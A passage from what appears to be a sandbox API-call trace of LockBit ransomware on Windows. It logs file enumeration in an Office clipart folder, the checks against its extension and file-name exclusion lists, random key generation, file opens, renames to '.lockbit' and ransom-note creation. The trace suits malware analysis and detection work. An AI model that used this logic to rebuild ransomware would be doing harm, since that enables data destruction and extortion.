0x77d7a8 [0114.466] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.467] free (_Block=0x77d7a8) [0114.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.467] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.467] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.467] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2364900, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd2364900, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x2332, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00779_.WMF", cAlternateFileName="")) returned 1 [0114.467] lstrcmpiW (lpString1=".", lpString2="FD00779_.WMF") returned -1 [0114.467] lstrcmpiW (lpString1="..", lpString2="FD00779_.WMF") returned -1 [0114.467] PathFindExtensionW (pszPath="FD00779_.WMF") returned=".WMF" [0114.467] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.467] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.468] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.469] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00779_.WMF") returned 1 [0114.469] lstrcmpiW (lpString1="ntldr", lpString2="FD00779_.WMF") returned 1 [0114.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00779_.WMF") returned 1 [0114.470] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00779_.WMF") returned -1 [0114.470] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00779_.WMF") returned -1 [0114.470] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00779_.WMF") returned 1 [0114.470] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00779_.WMF") returned 1 [0114.470] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.470] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF") returned=".WMF" [0114.470] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.470] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.470] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.471] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.471] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.lockbit") returned 72 [0114.471] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0114.487] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.487] malloc (_Size=0x40068) returned 0x3db04c0 [0114.487] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=9010) returned 1 [0114.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0114.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0114.488] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.493] malloc (_Size=0xa6) returned 0x77d7a8 [0114.493] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.494] free (_Block=0x77d7a8) [0114.494] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.494] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.494] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.494] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4adb300, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb4adb300, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x3690, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00799_.WMF", cAlternateFileName="")) returned 1 [0114.494] lstrcmpiW (lpString1=".", lpString2="FD00799_.WMF") returned -1 [0114.494] lstrcmpiW (lpString1="..", lpString2="FD00799_.WMF") returned -1 [0114.494] PathFindExtensionW (pszPath="FD00799_.WMF") returned=".WMF" [0114.494] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.494] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.494] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.495] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.495] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.496] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00799_.WMF") returned 1 [0114.497] lstrcmpiW (lpString1="ntldr", lpString2="FD00799_.WMF") returned 1 [0114.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00799_.WMF") returned 1 [0114.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00799_.WMF") returned -1 [0114.497] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00799_.WMF") returned -1 [0114.497] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00799_.WMF") returned 1 [0114.497] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00799_.WMF") returned 1 [0114.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned=".WMF" [0114.497] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.497] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.497] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.498] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.498] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.498] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.498] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.498] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.lockbit") returned 72 [0114.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0114.498] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.498] malloc (_Size=0x40068) returned 0x3d70450 [0114.498] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13968) returned 1 [0114.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0114.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0114.499] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.511] malloc (_Size=0xa6) returned 0x77d7a8 [0114.511] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.511] free (_Block=0x77d7a8) [0114.512] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.512] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.512] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad86a500, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad86a500, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0xa6d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00814_.WMF", cAlternateFileName="")) returned 1 [0114.512] lstrcmpiW (lpString1=".", lpString2="FD00814_.WMF") returned -1 [0114.512] lstrcmpiW (lpString1="..", lpString2="FD00814_.WMF") returned -1 [0114.512] PathFindExtensionW (pszPath="FD00814_.WMF") returned=".WMF" [0114.512] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.512] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.513] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.513] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00814_.WMF") returned 1 [0114.514] lstrcmpiW (lpString1="ntldr", lpString2="FD00814_.WMF") returned 1 [0114.514] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00814_.WMF") returned 1 [0114.514] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00814_.WMF") returned -1 [0114.514] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00814_.WMF") returned -1 [0114.514] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00814_.WMF") returned 1 [0114.514] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00814_.WMF") returned 1 [0114.514] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.514] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned=".WMF" [0114.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.514] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.514] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.515] lstrcmpiW (lpString1=".dacpac", 